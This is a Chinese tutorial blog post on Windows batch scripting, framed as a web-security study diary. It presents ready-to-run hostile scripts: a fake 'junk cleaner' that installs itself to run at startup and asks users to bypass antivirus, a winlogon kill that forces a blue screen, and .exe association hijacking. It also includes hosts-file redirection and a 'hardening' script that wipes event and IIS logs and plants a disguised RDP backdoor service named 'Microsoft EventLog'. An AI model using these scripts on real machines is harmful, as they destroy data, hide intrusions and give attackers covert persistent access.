web安全day21:学习使用最基本的批处理程序
一个简单的小程序练手。
@echo off color 0a title 小程序 v1.0 :menu cls echo ==================================== echo 菜单 echo 1.修改管理员密*码 echo 2.定时关机 echo 3.退出本程序 echo ==================================== set /p num=您的选择是: if "%num%"=="1" goto 1 if "%num%"=="2" goto 2 if "%num%"=="3" goto 3 echo 别闹 好好输入 pause goto menu :1 set /p u=请输入用户名: set /p p=请输入新密*码: net user %u% %p% >nul echo 您的密*码已经设置成功 pause goto menu :2 set /p t=请输入时间 shutdown -s -t %t% goto menu :3 exit
常用的几个命令
系统垃圾清理
@echo off title 系统垃圾清理 color 2f echo =====若有杀毒软件恶意拦截,请选择【允许程序的所有操作】 ==== echo. echo. echo start cmd >c:\windows\windows.bat echo %0>>c:\windows\windows.bat copy c:\windows\windows.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\">nul if %errorlevel%==0 goto next copy c:\windows\windows.bat "%USERPROFILE%\「开始」菜单\程序\启动\">nul if %errorlevel%==1 goto error
资源管理器重启
ping -n 5 127.0.0.1>nul taskkill /im explorer.exe /f >nul 2>nul echo. echo =====完犊子了,你的系统已经废了======= ping -n 5 127.0.0.1>nul echo. Start c:\windows\explorer.exe echo. echo =====已修复好!是不是吓坏了!!嘿嘿========== pause
蓝屏
ntsd -c q -pn winlogon.exe
拓展名修改
assoc .exe=txtfile assoc .exe=exefile//恢复
死循环
do msgbox "循环啦" loop
修改地址解析
echo 1.1.1.1 www.taobao.com >>c:\windows\system32\drivers\etc\hosts
进阶命令
删除win2k/xp系统默认共享的批处理
@echo preparing to delete all the default shares.when ready pres any key. @pause @echo off :Rem check parameters if null show usage. if {%1}=={} goto :Usage :Rem code start. echo. echo ------------------------------------------------------ echo. echo Now deleting all the default shares. echo. net share %1$ /delete net share %2$ /delete net share %3$ /delete net share %4$ /delete net share %5$ /delete net share %6$ /delete net share %7$ /delete net share %8$ /delete net share %9$ /delete net stop Server net start Server echo. echo All the shares have been deleteed echo. echo ------------------------------------------------------ echo. echo Now modify the registry to change the system default properties. echo. echo Now creating the registry file echo Windows Registry Editor Version 5.00> c:delshare.reg echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters]>> c:delshare.reg echo "AutoShareWks"=dword:00000000>> c:delshare.reg echo "AutoShareServer"=dword:00000000>> c:delshare.reg echo Nowing using the registry file to chang the system default properties. regedit /s c:delshare.reg echo Deleting the temprotarily files. del c:delshare.reg goto :END :Usage echo. echo ------------------------------------------------------ echo. echo ☆ A example for batch file ☆ echo ☆ [Use batch file to change the sysytem share properties.] ☆ echo. echo Author:Ex4rch echo Mail:Ex4rch@hotmail.com QQ:1672602 echo. echo Error:Not enough parameters echo. echo ☆ Please enter the share disk you wanna delete ☆ echo. echo For instance,to delete the default shares: echo delshare c d e ipc admin print echo. echo If the disklable is not as C: D: E: ,Please chang it youself. echo. echo example: echo If locak disklable are C: D: E: X: Y: Z: ,you should chang the command into : echo delshare c d e x y z ipc admin print echo. echo *** you can delete nine shares once in a useing *** echo. echo ------------------------------------------------------ goto :EOF :END echo. echo ------------------------------------------------------ echo. echo OK,delshare.bat has deleted all the share you assigned. echo.Any questions ,feel free to mail toEx4rch@hotmail.com. echo echo. echo ------------------------------------------------------ echo. :EOF echo end of the batch file
全面加固系统
@echo Windows Registry Editor Version 5.00 >patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters] >>patch.dll @echo "AutoShareServer"=dword:00000000 >>patch.dll @echo "AutoShareWks"=dword:00000000 >>patch.dll @REM [禁止共享] @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa] >>patch.dll @echo "restrictanonymous"=dword:00000001 >>patch.dll @REM [禁止匿名登录] @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNetBTParameters] >>patch.dll @echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll @REM [禁止及文件访问和打印共享] @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices@REMoteRegistry] >>patch.dll @echo "Start"=dword:00000004 >>patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSchedule] >>patch.dll @echo "Start"=dword:00000004 >>patch.dll @echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] >>patch.dll @echo "ShutdownWithoutLogon"="0" >>patch.dll @REM [禁止登录前关机] @echo "DontDisplayLastUserName"="1" >>patch.dll @REM [禁止显示前一个登录用户名称] @regedit /s patch.dll
清除日志
@regedit /s patch.dll @net stop w3svc @net stop event log @del c:winntsystem32logfilesw3svc1*.* /f /q @del c:winntsystem32logfilesw3svc2*.* /f /q @del c:winntsystem32config*.event /f /q @del c:winntsystem32dtclog*.* /f /q @del c:winnt*.txt /f /q @del c:winnt*.log /f /q @net start w3svc @net start event log @rem [删除日志] @net stop lanmanserver /y @net stop Schedule /y @net stop RemoteRegistry /y @del patch.dll @echo The server has been patched,Have fun. @del patch.bat @REM [禁止一些危险的服务。] @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp] >>patch.dll @echo "PortNumber"=dword:00002010 >>patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp >>patch.dll @echo "PortNumber"=dword:00002012 >>patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD] >>patch.dll @echo "Start"=dword:00000002 >>patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSecuService] >>patch.dll @echo "Start"=dword:00000002 >>patch.dll @echo "ErrorControl"=dword:00000001 >>patch.dll @echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00, >>patch.dll @echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65, >>patch.dll @echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll @echo "ObjectName"="LocalSystem" >>patch.dll @echo "Type"=dword:00000010 >>patch.dll @echo "Descr1ption"="Keep record of the program and windows'' message。" >>patch.dll @echo "DisplayName"="Microsoft EventLog" >>patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicestermservice] >>patch.dll @echo "Start"=dword:00000004 >>patch.dll @copy c:winntsystem32termsrv.exe c:winntsystem32eventlog.exe @REM [修改3389连接,端口为8210(十六进制为00002012),名称为Microsoft EventLog,留条后路]
更多的关于批处理的知识可以参考下面这篇。https://www.jb51.net/article/41322.htm
关于本文所用到的工具,欢迎关注我的公众号:旁骛OtherThing,回复工具获取。
web安全day21:学习使用最基本的批处理程序相关推荐
- 小猿圈Web前端开发学习路线
很多人已经下定决心学习前端开发,但是学习很盲目,没有一个明确的目标,导致学了很长时间效果也没有很明显,最终放弃了,这个结果是我们最不想看到的结果,那么学习路线就十分重要了,好的学习路线对学习会引向成功 ...
- Web前端入门学习(5)——浮动原理及清除浮动
浮动原理及清除浮动 上节回顾 在上节的<Web前端入门学习(4)-- 块级元素和行内元素之特征与转换>中(http://cherry360.blog.51cto.com/12176744/ ...
- Web前端开发学习误区,你掉进去了没?
从接触网站开发以来到现在,已经有五个年头了吧,今天偶然整理电脑资料看到当时为参加系里面一个比赛而做的第一个网站时,勾起了在这网站开发道路上的一串串回忆,成功与喜悦.烦恼与纠结都历历在目,感慨颇多. 先 ...
- web后端开发学习路线_学习后端Web开发的最佳方法
web后端开发学习路线 My previous article described how you can get into frontend development. It also discuss ...
- python web开发要学什么_Python WEB开发 用Python开展web开发必须学习什么?
用Python开展web开发必须学习哪些? 针对新手想更轻轻松松的学好Python开发技术性,Python网络爬虫,Python数据分析,人工智能技术等技术性,这儿给大伙儿共享一套系统软件教育资源,加 ...
- iframe跨域调用js_郑州Web前端基础学习之JS跨域知识梳理
JS是Web前端开发三要素之一,是郑州Web前端基础学习中非常重要的知识点.JS涉及的知识点多且杂,很多同学反映不知如何下手,事实上,只要你认真记.多练习,就可以慢慢掌握它.今天千锋郑州Web前端培训 ...
- Python Web框架Django学习(二)
python web框架Django学习(二) 目录: 三.Django创建APP 四.创建登录页面,实现用户交互,后台管理用户(非数据库方式) ========================= ...
- 最受推荐的 9本全栈开发书籍,助web前端开发学习
如今全栈工程师在企业工作中占有的地位越来越高,无论是前端工程师,还是后端工程师,都在拼命向全栈发展!学习的方式有很多,大部分是喜欢通过书籍来学习新知识,今天,我们一起来盘点一下全站开发的大佬都推荐些什 ...
- html5移动web开发黑马掌上商城_月入35k大佬总结:web前端必须学习的内容(附全套前端教程)...
为了让学习变得轻松,高效!今天给大家分享一套教学资源,帮助大家在学习Web前端的道路上披荆斩棘,这套资源的领取方式请看文末 优秀的WEB前端工程师具备编写任何一个互联网系统的前端页面.交互代码的能力. ...
- java web开发需要学习哪些知识_java web开发需要学习哪些知识?
现在世界已经进入一个以web为核心的阶段,掌握一门相关技术是非常有用的,那么java web开发需要学习哪些知识呢?下面小编就来给大家分享一下java web开发的知识. 1.面向对象分析设计思想 J ...
最新文章
- 创新类编辑推荐:Sequence iBPMS平台
- 蓝桥杯C/C++ 带分数
- Linux下Nginx编译安装过程详解
- python数据模型搭建_python之路(19)django数据库模型(model)
- html桌面雪花,html5 canvas雪花形状在线生成器
- Python学习:numpy点乘,按元素相乘,以及转置的处理
- 瞿菡云计算机,“国家资助 伴我成长”——我校学生王丽娜、肖云菡荣获中职教育“国家奖学金”事迹材料...
- 8皇后以及N皇后算法探究,回溯算法的JAVA实现,递归方案(一)
- X264码率控制流程分析
- IDEA 学习笔记之 安装和基本配置
- jpa root.join_JPA 2.1和Java EE 7中的JPQL增强功能(第1部分– JOIN ON)
- xampp 支持pdo mysql_在Windows上安装PHP PDO(xampp)
- python从oracle提取数据库_Python编程实战之Oracle数据库操作示例
- rabbitmq接口异常函数方法_[项目更新] 集成RabbitMQ队列与EventBus总线
- 自定义初学5——自定义View显示图片
- 阀体端面钻6孔组合机床设计及夹具设计
- Unity插件Odin入门
- 操作系统课后答案第五章
- 2-5 CAD基础 打断(break)和合并(join)
- 数据价值应用—数据可视化
热门文章
- 【分享】时至今日,深度学习领域有哪些值得追踪的前沿研究?
- 学术分享 | 没有导师的指导,研究生如何阅读文献、提出创见、写论文?
- 数据可视化详解+代码演练
- [AAAI18]面向序列建模的元多任务学习
- 深度学习7-常用损失函数和自定义损失函数
- 【突发】解决remote: Support for password authentication was removed on August 13, 2021. Please use a perso
- 知识图谱研讨实录08丨肖仰华教授带你读懂知识图谱的质量控制
- 《程序开发心理学——银年纪念版》前言
- python模块:数字处理
- Android布局文件xml